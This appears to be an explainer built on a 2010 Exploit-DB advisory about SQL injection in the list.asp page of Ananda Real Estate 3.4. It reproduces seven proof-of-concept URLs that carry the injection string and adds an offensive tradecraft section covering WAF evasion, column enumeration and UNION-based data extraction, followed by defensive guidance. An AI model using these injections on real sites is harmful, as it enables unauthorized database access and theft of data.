Ananda Real Estate 3.4 'list.asp' SQL Injection Explained

What this paper is

This paper details multiple SQL injection vulnerabilities found in the "list.asp" page of Ananda Real Estate version 3.4. The vulnerabilities allow an attacker to inject malicious SQL code into various parameters, potentially leading to unauthorized data access or manipulation. The paper provides example URLs demonstrating how to trigger these injections.

Simple technical breakdown

Web applications often use databases to store information. When a user interacts with a web page, the application might construct a database query based on the information provided in the URL or form. If the application doesn't properly clean or validate user input before using it in a SQL query, an attacker can insert special SQL commands.

In this case, the "list.asp" page takes several parameters (like city, state, country, minprice, maxprice, bed, bath) and uses them to filter real estate listings. The vulnerabilities lie in how these parameters are handled. By injecting ')) union insect, the attacker is attempting to:

1. Close existing SQL syntax: The ')) part is likely intended to close an open parenthesis and a closing quote that the application might have already put around the user's input in its SQL query.
2. Inject new SQL: The union keyword is a standard SQL command that combines the results of two or more SELECT statements.
3. Cause an error/trigger: The insect part is not a valid SQL keyword. Its purpose here is likely to cause a SQL error. This error might reveal information about the database structure or confirm that the injection was successful. The specific string "insect" might be chosen to be easily identifiable in error messages or logs.

The paper shows that this injection can be performed on almost any of the filtering parameters.

Complete code and payload walkthrough

The provided "code" in the paper is not actual executable code in the traditional sense (like a script or program). Instead, it consists of crafted URLs that exploit the web application's backend logic. The "payload" is the malicious string injected into the URL parameters.

Let's break down the structure of the example URLs and the injected payload:

Example URL Structure:

http://[host]/[path]/list.asp?city=%27%29%29+union+insect&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!

• http://[host]/[path]/list.asp: This is the target web page.
• ?: Separates the URL path from query parameters.
• city=%27%29%29+union+insect: This is the vulnerable parameter.
  • city=: The parameter name.
  • %27: URL-encoded representation of a single quote (').
  • %29: URL-encoded representation of a closing parenthesis ()).
  • %29: Another URL-encoded closing parenthesis ()).
  • +: URL-encoded representation of a space.
  • union: The SQL UNION operator.
  • insect: A non-SQL keyword, likely for triggering an error.
• &: Separates different parameters.
• state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!: These are other parameters, some are empty, some have default values. Their presence or absence might affect how the SQL query is constructed.

The Injected Payload:

The core of the injected payload is: ')) union insect

Mapping list:

• list.asp?city=...: Target ASP page and a parameter that is vulnerable to SQL injection.
• %27: Attempts to close a single quote that the application might have used to delimit string input in its SQL query.
• %29%29: Attempts to close two open parentheses that the application might have used to group conditions or enclose input in its SQL query.
• +: Represents a space, used to separate SQL keywords and identifiers.
• union: The SQL keyword used to combine result sets from two or more SELECT statements.
• insect: A string that is not a valid SQL keyword or identifier. Its purpose is to cause a SQL error, which can confirm the injection and potentially leak database information.

Explanation of the Injection Logic:

The application likely constructs a SQL query similar to this (simplified):

SELECT * FROM properties WHERE city = '[user_input_for_city]' AND ...

When the attacker sends the URL with city=%27%29%29+union+insect, the query might become:

SELECT * FROM properties WHERE city = ''') union insect' AND ...

The ')) part is crucial. It's designed to break out of the expected SQL syntax.

• The first ' closes the quote around the original city value.
• The first ) closes an open parenthesis.
• The second ) closes another open parenthesis.

After breaking out, the UNION operator is introduced. The UNION operator requires that the SELECT statements have the same number of columns and compatible data types. The insect part is likely an attempt to make the UNION statement syntactically incorrect in a way that generates a predictable error, revealing information.

The paper lists multiple parameters (city, state, country, minprice, maxprice, bed, bath) where this injection can be performed, indicating that the application uses user input from these parameters in a similar vulnerable manner within its SQL queries.

Practical details for offensive operations teams

• Required Access Level: Unauthenticated access to the web application. The vulnerabilities are present in publicly accessible parameters.
• Lab Preconditions:
  • A running instance of Ananda Real Estate 3.4 or a similar web application with the vulnerable list.asp page.
  • A web server (e.g., IIS) configured to host the ASP application.
  • A database backend (e.g., SQL Server) that the ASP application connects to.
  • Network access to the target web server.
• Tooling Assumptions:
  • Web Browser: For manual testing and observation.
  • Proxy/Interception Tool: (e.g., Burp Suite, OWASP ZAP) Essential for crafting and modifying requests, observing responses, and automating the process.
  • SQL Injection Tools: (e.g., SQLMap) Can automate the discovery and exploitation of these types of vulnerabilities.
  • URL Encoder/Decoder: To properly construct and interpret URLs.
• Execution Pitfalls:
  • URL Encoding: Incorrectly encoded characters can lead to the payload not being interpreted as intended by the web server or application.
  • Database Specific Syntax: The exact payload (')) union insect) might need slight modifications depending on the specific SQL dialect (e.g., SQL Server, MySQL) used by the backend database. The insect string's effectiveness in generating an error might vary.
  • WAF/IDS Evasion: Modern Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect the UNION keyword or the pattern of closing parentheses and quotes. Obfuscation techniques might be required.
  • Parameter Order/Number of Columns: For successful data extraction using UNION SELECT, the attacker needs to know the number of columns in the original query and their data types. The insect payload is a simpler way to confirm injection without necessarily extracting data initially.
  • Application Logic: The application might have backend checks or sanitization that are not immediately obvious from the URL.
• Tradecraft Considerations:
  • Reconnaissance: Identify the target application version and specific vulnerable pages/parameters.
  • Probing: Start with simple error-based injections (like the one in the paper) to confirm vulnerability.
  • Enumeration: Once confirmed, attempt to determine the number of columns in the original query (e.g., by using ORDER BY clauses with increasing numbers).
  • Data Extraction: Use UNION SELECT to extract sensitive data (usernames, passwords, configuration details, etc.).
  • Blind SQLi: If error messages are suppressed, explore blind SQL injection techniques.
  • Post-Exploitation: Depending on the database and application permissions, further actions might include privilege escalation, file system access, or command execution.

Where this was used and when

• Product: Ananda Real Estate 3.4. This is a specific real estate website management software.
• Approximate Year: The paper was published on December 2, 2010. Therefore, this vulnerability was likely discovered and reported around this time. Exploitation would have been relevant in the period leading up to and shortly after 2010.

This type of vulnerability is common in older web applications that were not built with robust security practices in mind. It's a classic example of SQL injection that has been present in web development for many years.

Defensive lessons for modern teams

• Input Validation and Sanitization:
  • Never trust user input. All data coming from the client (URL parameters, form fields, cookies, headers) must be treated as potentially malicious.
  • Implement strict input validation. Allow only expected characters and formats.
  • Sanitize input by escaping special characters that have meaning in SQL (e.g., ', ", ;, --, ( , )).
• Parameterized Queries (Prepared Statements):
  • This is the most effective defense against SQL injection.
  • Parameterized queries separate the SQL code from the data. The database engine treats the input data strictly as data, not as executable SQL commands.
  • Example in pseudocode:

    sql_query = "SELECT * FROM properties WHERE city = ?"
    execute_query(sql_query, [user_provided_city])

• Least Privilege Principle:
  • The database user account used by the web application should have only the minimum necessary permissions. It should not have administrative privileges or the ability to drop tables or execute arbitrary commands.
• Web Application Firewalls (WAFs):
  • WAFs can detect and block common SQL injection patterns. However, they are not a foolproof solution and can be bypassed. They should be used as a layer of defense, not the primary one.
• Regular Patching and Updates:
  • Keep the web application software, its components, and the underlying database and operating system up to date with the latest security patches.
• Error Handling:
  • Configure the application to display generic error messages to users. Detailed database error messages can leak valuable information to attackers. Log detailed errors server-side for debugging.
• Security Testing:
  • Regularly perform security assessments, including penetration testing and vulnerability scanning, to identify and remediate SQL injection flaws.

ASCII visual (if applicable)

This vulnerability is primarily about how data flows from the user's browser into the web application's backend SQL query. A simple visual can represent this:

+-----------------+      +-----------------+      +-----------------+      +-----------------+
| User's Browser  |----->| Web Server      |----->| Web Application |----->| Database Server |
| (Crafted URL)   |      | (list.asp)      |      | (ASP Code)      |      | (SQL Query)     |
+-----------------+      +-----------------+      +-----------------+      +-----------------+
        ^                                                  |
        |                                                  |
        +--------------------------------------------------+
                     (Malicious Input in URL Parameter)

In this diagram:

1. The User's Browser sends a request with a crafted URL containing malicious input.
2. The Web Server receives the request and passes it to the Web Application (specifically list.asp).
3. The Web Application (ASP code) takes the input from the URL parameter.
4. Crucially, if not properly sanitized, the application directly incorporates this input into a SQL query sent to the Database Server.
5. The Database Server executes the query, which, due to the injection, might behave unexpectedly, leading to data leakage or other unintended consequences.

The vulnerability lies in the direct incorporation of user input into the SQL query without proper validation or escaping.

Source references

• PAPER ID: 15661
• PAPER TITLE: Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections
• AUTHOR: underground-stockholm.com
• PUBLISHED: 2010-12-02
• PAPER URL: https://www.exploit-db.com/papers/15661
• RAW URL: https://www.exploit-db.com/raw/15661

Original Exploit-DB Content (Verbatim)

TITLE: Ananda Real Estate "list.asp" Multiple SQL Injection Vulnerabilities
PRODUCT: Ananda Real Estate 3.4
PRODUCT URL: http://www.softwebsnepal.com/website_design_realestate.htm
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/

BUGS:

http://[host]/[path]/list.asp?city=%27%29%29+union+insect&state=&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=%27%29%29+union+insect&country=&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=%27%29%29+union+insect&minprice=0&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=%27%29%29+union+insect&maxprice=0&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=%27%29%29+union+insect&search=yes&bed=0&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=%27%29%29+union+insect&bath=0&Submit=Search+Now!
http://[host]/[path]/list.asp?city=&state=&country=&minprice=&maxprice=&search=yes&bed=&bath=%27%29%29+union+insect&Submit=Search+Now!